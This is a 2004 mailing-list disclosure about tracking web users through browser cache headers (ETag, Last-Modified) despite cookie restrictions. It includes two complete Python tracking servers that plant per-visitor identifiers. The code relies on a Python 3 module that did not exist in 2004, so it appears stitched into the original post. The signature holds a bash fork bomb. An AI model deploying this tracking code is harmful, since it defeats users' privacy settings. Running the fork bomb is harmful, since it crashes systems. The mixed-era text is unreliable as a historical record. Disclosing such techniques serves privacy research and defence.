Message-ID: <20040119221146.X93922@dekadens.coredump.cx>
From: lcamtuf at ghettot.org (Michal Zalewski)
Subject: a method for bypassing cookie restrictions in web browsers

Hey,

I noticed that in a typical web browser, it is possible to bypass
privacy settings that restrict cookies or disable them altogether. This
effectively enables remote entities to track users or otherwise violate
their privacy by storing a unique, persistent piece of information on
the victim's system. The information stored this way can only be retrieved
by the entity that generated it in the first place, but by inserting shared
design elements into web pages on different servers (banners, web bugs,
etc.), it is possible to track the victim across domains.

The attack abuses the fundamental design of caching and cache refreshing
as used in HTTP. In the most trivial scenario, the attacker sends a unique
identifier in ETag or Last-Modified headers returned for a web page (or
some other resource) the victim requested. The page, along with this
metadata, will be cached by the browser.

For as long as the document lives in the cache (it is generally dropped
only if the cache size limit is exceeded - and the default configuration is
often generous - or if the user chooses to purge it manually), all attempts
to revisit this page or fetch this particular resource will be accompanied
by an appropriate If-None-Match or If-Modified-Since header. This is
done so that the server may return "304 Not Modified" if the file has not
changed since the cached fetch, thus sparing the browser from having to
reload its contents.
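
Just to make this concrete, here is a rough sketch of what the server
side might look like (hypothetical Python using the standard http.server
module; the class name, port, and the in-memory "seen" set are all made
up for illustration, not taken from any real tracker):

    import uuid
    from http.server import BaseHTTPRequestHandler, HTTPServer

    # Identifiers handed out so far (a real tracker would persist these).
    seen = set()

    class ETagTracker(BaseHTTPRequestHandler):
        def do_GET(self):
            etag = self.headers.get("If-None-Match")
            if etag and etag.strip('"') in seen:
                # Returning visitor: the browser echoes back the identifier
                # we planted earlier; a 304 keeps the cache entry alive.
                self.log_message("returning visitor: %s", etag)
                self.send_response(304)
                self.send_header("ETag", etag)
                self.end_headers()
                return
            # First visit: mint a fresh identifier and hand it out as the ETag.
            visitor_id = uuid.uuid4().hex
            seen.add(visitor_id)
            body = b"GIF89a"  # stand-in for a banner / web bug
            self.send_response(200)
            self.send_header("Content-Type", "image/gif")
            self.send_header("ETag", '"%s"' % visitor_id)
            # Force revalidation on every use, while keeping the cached copy.
            self.send_header("Cache-Control", "no-cache")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("", 8000), ETagTracker).serve_forever()

The same trick works with Last-Modified and If-Modified-Since; there the
timestamp itself becomes the identifier.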

Both headers, however, if initially chosen to be unique for every new
session encountered by the server, can also be used to distinguish and
track revisiting users. In this regard, the mechanism is very similar to
cookies. Moreover, if generating unique Last-Modified or ETag headers is
undesirable or difficult, it is also possible to embed a dynamically
generated, unique web bug (such as custid-12874897.jpg) in a page that the
server claims has not been modified for a very long time; since the page
appears to be old, the browser will not update it, and will instead check
for modifications of the web bug itself, using the ID previously provided
within the main page.
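
A sketch of this variant as well (again hypothetical code of mine; the
custid-<id>.jpg naming just mirrors the example above):

    import uuid
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class WebBugTracker(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == "/":
                if self.headers.get("If-Modified-Since"):
                    # Tell the browser its cached copy - with the old unique
                    # image URL inside it - is still current.
                    self.send_response(304)
                    self.end_headers()
                    return
                # First visit: serve the page as if it were ancient, with a
                # per-visitor image URL baked into it.
                visitor_id = uuid.uuid4().hex
                page = ('<html><body><img src="/custid-%s.jpg">'
                        '</body></html>' % visitor_id).encode()
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.send_header("Last-Modified",
                                 "Mon, 01 Jan 1990 00:00:00 GMT")
                self.send_header("Content-Length", str(len(page)))
                self.end_headers()
                self.wfile.write(page)
            elif self.path.startswith("/custid-"):
                # Every later request for the image carries the identifier
                # in its name, whether or not cookies are enabled.
                visitor_id = self.path[len("/custid-"):-len(".jpg")]
                self.log_message("returning visitor: %s", visitor_id)
                self.send_response(200)
                self.send_header("Content-Type", "image/jpeg")
                # Make the browser ask for the image again on the next visit.
                self.send_header("Cache-Control", "no-cache")
                self.send_header("Content-Length", "0")
                self.end_headers()

    HTTPServer(("", 8000), WebBugTracker).serve_forever()

Here neither ETag nor Last-Modified needs to be unique; the identifier
hides in the image URL that the stale cached page keeps requesting.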

This appears to be an efficient and quite reliable substitute for cookies.
There seems to be no easy way to disable this mechanism (short of
completely disabling or severely impairing document caching in general,
which often causes a considerable performance impact and increased
bandwidth costs).

The mechanism may fail if a page is not revisited for a very long time
(and is removed from the cache), but will work exceptionally well for
resources that are fetched quite regularly (think banner providers).

Using caching proxies may mitigate the risk (I wouldn't jump the gun and
claim it renders the technique entirely useless, though), but then again,
it is possible to bypass many proxies by using https web bugs.

Any thoughts? Is the technique something new?

-- 
------------------------- bash$ :(){ :|:&};: --
 Michal Zalewski * [http://lcamtuf.coredump.cx]
    Did you know that clones never use mirrors?
--------------------------- 2004-01-19 22:11 --

   http://lcamtuf.coredump.cx/photo/current/

